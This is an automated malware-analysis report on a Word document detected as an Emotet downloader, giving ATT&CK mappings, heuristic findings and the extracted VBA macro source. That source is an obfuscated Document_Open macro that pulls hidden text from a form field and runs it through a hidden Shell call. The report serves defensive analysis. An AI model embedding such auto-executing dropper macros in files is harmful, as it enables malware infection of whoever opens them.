MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample contains VBA macros, specifically a Document_Open macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary code, likely to download and run a secondary payload. ClamAV detection as 'Doc.Downloader.Emotet-6872645-0' strongly suggests the Emotet family and its downloader capabilities.
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-6872645-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6872645-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1983 bytes |
SHA-256: 22a9ead0d2840841e61f6d866dca69bfde13e4b8ae9ceaa2f0e3134d444dd592 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Dim IrcSTp As Single
IrcSTp = Int(39192.497252085)
Dim SFypH As Byte
SFypH = 122
Dim FnfEuU5pX As Single
FnfEuU5pX = Sgn(30991.687716647)
If -168 + 232 = -1437 + 1442 Then
VJUet3sK = "C6FNaZMtR"
End If
Dim w4sk0CoR As Byte
w4sk0CoR = 90
Call z
End Sub
Attribute VB_Name = "te3RE2"
Sub Hjg7h1K()
End Sub
Public Sub z()
Dim FMZNLxt As Single
FMZNLxt = Sgn(53762.253692015)
Dim YC4lmx As Long
YC4lmx = 0
Dim R1Tbl As String
R1Tbl = Val("Q")
Dim oRjqu9raL As Boolean
oRjqu9raL = False
Dim QbGW2po8 As String
QbGW2po8 = Val(dZ5aDsu)
Dim JXgNwt As Long
JXgNwt = Sgn(0)
Dim gqw1bEWCO As Byte
gqw1bEWCO = 119
nnVmzl36 = VBA.Shell(LHN08X, 0)
End Sub
Attribute VB_Name = "aIzW4"
Sub VWP29obw0()
End Sub
Sub YZYo5()
End Sub
Sub E7HVB()
End Sub
Attribute VB_Name = "cXZdfnr"
Sub VlSpfV()
Dim xk7ZuHsV As Byte
xk7ZuHsV = 32
Dim e50cZjev As Byte
e50cZjev = 247
End Sub
Public Function LHN08X()
Dim np5glO As Double
np5glO = Fix(6793.8523434159)
Dim BGKS0VpZ As Byte
BGKS0VpZ = 180
Dim fnDmJ As Object
Dim dzrqT8 As Long
dzrqT8 = -1295325084
Dim qANbMoe
qANbMoe = LTrim(U0eaCH)
Set fnDmJ = New fm
Dim KPRiz
KPRiz = vbNullString
Dim BUJvBe As Boolean
BUJvBe = False
Dim xaIBphs
xaIBphs = LCase(Zh4M1EV)
Dim j4nrwtGRC
j4nrwtGRC = "8"
LHN08X = fnDmJ.mynewtxt.Text
End Function
Attribute VB_Name = "fm"
Attribute VB_Base = "0{782A6242-166A-4BBA-A3E1-13BD6A677933}{75BF4742-16E8-4555-A815-8BCC71B664F0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.